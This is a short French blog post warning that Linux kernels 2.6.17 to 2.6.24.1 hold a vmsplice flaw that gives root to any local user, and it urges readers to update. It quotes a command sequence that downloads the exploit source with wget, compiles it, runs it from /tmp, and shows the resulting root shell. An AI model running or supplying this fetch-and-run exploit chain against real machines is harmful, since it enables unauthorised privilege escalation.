Prévenu par Koreus et vu plus en détails sur l’excellent site Tux-planet, une horrible faille dans les kernels 2.6.17 à 2.6.24.1.
L’exploit dont parle Tux-Planet permet donc d’obtenir un accès root sur n’importe quelle machine à partir d’un compte user standard…
Ca craint un peu beaucoup. Pensez donc à mettre à jour votre Kernel. (opération délicate quand même !)
Voici un extrait de l’article de Tux Planet que je vous invite à consulter ici.
cd /tmp
wget http://public.tux-planet.fr/c/vmsplice-local-root-exploit.c
gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c
./vmsplice-local-root-exploit
…
[root@localhost tmp]# id
uid=0(root) gid=0(root) groups=505(sbilbeau)
Merci encore à Koreus et à Pti-Seb
PROMO Fire TV Stick 4K Ultr
-20 € sur la plus puissante des versions du stick d’Amazon
Profitez d’une qualité d’image brillante avec l’accès aux formats 4K Ultra HD, Dolby Vision, HDR et HDR10+. Découvrez un son immersif avec le support pour son Dolby Atmos sur certains titres Prime Video.
Regardez vos programmes préférés sur Prime Video, Netflix, YouTube, Molotov, ARTE, France 24, Disney+, Apple TV et plus encore (des abonnements séparés peuvent être requis).
Accédez à des milliers d’applications et de Skills Alexa, ainsi qu’à des millions de sites Web.